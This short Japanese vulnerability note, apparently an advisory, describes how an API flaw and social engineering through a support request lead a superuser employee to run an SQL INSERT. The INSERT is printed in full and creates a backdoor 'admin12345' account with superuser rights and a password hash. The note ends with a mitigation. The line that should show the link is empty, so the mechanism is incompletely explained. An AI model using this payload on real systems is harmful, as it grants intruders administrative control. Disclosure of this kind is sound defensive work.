この脆弱性は、APIの欠陥とソーシャルエンジニアリングに基づいています。
クライアントは、リンク(通常はリンクテイマー)を使用して、サポートサービスへのアクティブな要求を生成します。
リンクを含む:
その後、スーパーユーザー権限を持つ従業員は、次のSQLクエリを使用してadmin12345アカウントにスーパーユーザー権限を付与します。
insert into user (id,name,account,password,realname,email,lang,superuser,disabled,support,remotesupport,changepasswd,sendsms)
values (23351,'admin12345',1,'$1$FALDvy2D$fqFzhtlSZrq1pDQ3fkrpr/','test
test','test@test.test','ru','1','0','0','0','2012-01-29','0');
一時的な解決策として、1つのアカウントのみにスーパーユーザー権限を与え、残りはこのオプションをオフにします。